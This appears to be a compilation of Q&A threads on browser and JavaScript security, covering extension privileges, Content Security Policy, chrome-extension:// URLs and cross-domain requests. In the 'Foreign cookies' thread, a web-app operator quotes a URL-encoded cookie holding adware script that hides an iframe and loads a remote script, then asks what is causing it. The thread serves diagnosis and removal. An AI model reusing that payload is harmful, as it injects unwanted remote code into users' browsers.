Why i can't load the Facebook SDK into Firefox Extention? - javascript

i have seen this Post:
Authenticate a facebook user in a Firefox plug-in
and in the third comment someone said, that it isn't possible to load the facebook sdk into a firefox extension. But why?

The JavaScript SDK provided by Facebook relies on a script from connect.facebook.com to be inserted into a web page. However, when you are an extension you don't have a web page around to load this script - you have extension pages. These extension pages are privileged, loading the script into them would give that script permission to do things like reading files on user's disk drive (or simply format it). Doing that with a script on some remote server is a pretty big security risk even if Facebook is considered a trusted site - its servers could get hacked or the traffic might be intercepted and modified. An attacker could then essentially take over user's computer.
Getting an unprivileged context for the Facebook SDK is theoretically possible. Practically however this is complicated enough that I doubt anybody has done it (it's further complicated by the fact the App IDs are bound to a specific host name).


How to ensure that JavaScript page does not communicate

I created a small JavaScript application for which I reused some (quite large) JavaScript resources that I downloaded from the internet.
My application runs in the browser like other interactive web applications but works entirely offline.
However, I intend to enter some private information in the application which it shall visualize. Since I cannot ultimately trust the JavaScript pieces that I downloaded, I wonder if there is a JavaScript option to make sure that no data is downloaded and, in particular, uploaded to the web.
Note that I am aware that I can cutoff the local internet connection or perhaps change browser settings or use an application firewall, but this would not be a solution that suits my needs. You may assume that the isolation of a browser instance is save, that is no other, possibly malicious, web sites can access my offline JavaScript application or the user data I enter. If there is a secure way to (automatically) review the code of the downloaded resources (e.g. because communication is possible only via a few dedicated JavaScript commands that I can search for) that would be an acceptable solution too.
You should take a look at the Content Security Policy (CSP) (see here and here). This basically blocks every connection from your browser to any other hosts, unless explicitely allowed. Be aware that not all browsers support CSP, which leads to potential security problems.
Reviewing the library code might be difficult because there are many ways to mask such code pieces.
Find it yourself by watching your browser's network activity while your application is in action.
There are more than enough tools to do this. Also, if you know how to use netstat command line tool, it is readily shipped with windows.
Here is one cool chrome extension which watches the traffic of the current tab.
And, here is another extension which can modify the selected traffic.
You can set the filters and modify all requests/responses happening in your page.
If you want to write an extension to block requests yourself, check this answer out.

Foreign cookies in client requests

Some clients send requests to our webapp with additional cookies like this:
vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;
Our application does not install such cookies. We used some external JavaScript, like Google Analytics, but none of those scripts is doing this. Our site is accessible only via HTTPS, so MITM request modification is unlikely.
We use WAF, these requests are blocked and clients are unhappy.
I suppose, some malicious browser extension is trying to exploit some popular web engine vulnerability.
Has anybody encountered anything like this? Any ideas on what is doing that?
P.S. URL decoded content of that cookie is javascript, that among other contains link to http://yieldkit.com/legal-notes/terms-of-service/, but they are probably just used by scammer to monetize their attacks.
Found it. This malware does this: http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/ (article in russian) and translated with google translate.
Short summary:
There is a malware, that creates pop-up advertising windows with r.srvtrck.com site for Chrome, Firefox and IE. Also it may integrate advertising into web sites you open.
To remove it, you can use:
AdwCleaner program
Malwarebytes Anti-malware program
reset browser settings
clear *.lnk files from added site address after browser executable
AdGuard program to block advertising (I'd not recommend that, just clear your system and use AdBlock/uBlock)
It is recommended to check Windows Task Scheduler for unwanted tasks, that periodically start browser with malware site address.

What is "chrome-extension://"

I found the some strange <script/> tags on a site:
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script>
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script>
I haven't been able to find much information on this, but I highly doubt this is actually related to Google Chrome since this site in particular is still using <table>s for layout, and the source in question was retrieved with curl not a graphical web browser.
What on earth is this?
What is chrome-extension://
Why is it using lifbcibllhkdhoafpjfnlhfpfgnpldfl as a directory name
Why is it pretending to be valid URL to a javascript file?
Why would I need find_proxy or document_iterator
Solved. As far as I know...
chrixian was right, It seems that only on this and a few select other pages, someone had re-saved them from Chrome's source-view with the Skype extension installed.
Thanks everyone for all your help, +1's for all! enjoy!
That is actually Skype Click to Call chrome extension.
Manage and view it using this link
If you are using cURL to get the page, you're getting the HTML as it exists on the server--so I think a safe assumption would be: the author of the page initially saved the page from Chrome, he had an extension installed that inserted these script tages and lastly he didn't remove the script tags for one reason or another before putting the page on the server.
This is added by chrome as the page loads, to inject the extension's Javascript code into the page, so it can access the HTML document.
The Skype extension causes it by inserting all kinds of junk in webpages that you visit.
Do you have the Skype browser extension installed for Chrome?
Just disable the extension.
Chrome, like Firefox, provides developers with an easy API to extend the functionality of the web browser without needing to actually download and build the browser to do so.
They also provide a robust delivery system. In Google's case, it's the Google Chrome Web Store.
Extensions are installed locally on your computer, and use long strings as directory names to reduce the risk of collisions with another extension. In other words, if you and I both named our extensions "mycoolextension", then there would be a problem if a person tried to install your extension and my extension. The long string helps prevent collisions such as this.
The chrome-extension:// protocol is used by the browser to make requests to these local resources. Chrome extensions are developed using HTML5, JavaScript, and CSS, along with an API exposed to allow the local JavaScript to perform actions it would not normally be able to do on the Internet.
When you see these in the Chrome developer tools, it's just the extension doing it's thing, whatever that may be.
If you're seeing these, then you likely installed some extensions from the Chrome Web Store. To view them, go to the Tools menu and select "Extensions". This will show you a list of all installed Chrome extensions and apps.
To learn more about extension development, see the Getting Started Tutorial.
Also, as someone else mentioned, you're using the Skype Call Extension. However, an app using that directory name doesn't appear in the first page of the search results. It might be worth doing some more research to make sure you got that extension from a legitimate source, whether that be Skype or the Chrome Web Store.
If you're seeing it in Chrome developer tools for every request you make, it means it has access to all your websites, which could be benign, like if they're just making phone numbers clickable, or it could be malicious, if it's scraping your bank account info and shipping it off to some third party server. :)
It's a Chrome extension, and chrome-extension:// is a URL for extensions to address their contents via Javascript.
lifbcibllhkdhoafpjfnlhfpfgnpldfl is the unique identifier for the extension. I can't find it with a search, but apparently it might be Skype.
It's not pretending... it is a valid URL. The Javascript file is located in the extension. If you were to look on your harddrive you'd probably find that very file in the extensions folder.
The functions its calling probably are some sort of detection used by the extension to see if it needs to enable itself.
See this for some additional information:
Checking if user has a certain extension installed

Change server HTML app into self-contained desktop app

I wrote a simple web server that takes the public link to a google document containing image urls and names and outputs a print-friendly HTML photo directory with its contents.
I created it for a volunteer organization that I will no longer be able to stay involved in. I need to pass on the ability to generate that directory to my successor.
I'm not confident that I can trust myself to maintain that web application for the long term the organization needs. I'm hoping that instead I can change it to a self contained program, that members of the org could email around to whoever needed to generate the directory.
My first thought was to make a .html file the could open in a browser but I can't download the CSV data from google with Ajax, because it is cross domain. After googling there doesn't seem to be a way around this.
Is there a straightforward framework? I would guess I could do it with Adobe AIR, but I'd prefer something that simply removed the cross domain security feature.
I could take the time to embed a UIWebView into a Mac app, but since I want to write the app primarily in HTML, I'd have to create a bridge to let the web view make a cross domain request anyway right? Also it's not cross platform.
Any other ideas? How can I package my app as a desktop application instead of a web service?
You can get around the cross domain XHR using flash. CrossXhr can do it from apps served by regular http servers. I've never tried it with a static, file-served webapp. Follow the instructions here:

XMLHttpRequest.open, does it work on remote websites?

I'm a bit confused about this.
Does XMLHttpRequest work on a remote URL or does it have to be a local file? There seems to be mixed information on the net.
According to w3.org: The XMLHttpRequest object can be used by scripts to programmatically connect to their originating server via HTTP.
But I've seen it used to access non-local web pages (in vista gadgets for instance for rss feeds) without using a proxy...
Enlighten me please!
It depends on the environment. If you run your JavaScript on a regular web page, XMLHttpRequest won't be able to connect to any other site. (That's what w3.org says, and browsers do implement this restriction.) However, in some contexts (such as Vista gadgets and Greasemonkey), it it possible to connect to any site in an AJAX request.
On a standerd web page you cant however in an app with authorised permissions you can such as a chrome extension with the permission "http://*" set. In my opinion this is a stupid restriction for normal web pages any damage/harm that can be done with it could be done using an iframe and the browsers refuse to disable them (long over due in my opinion).

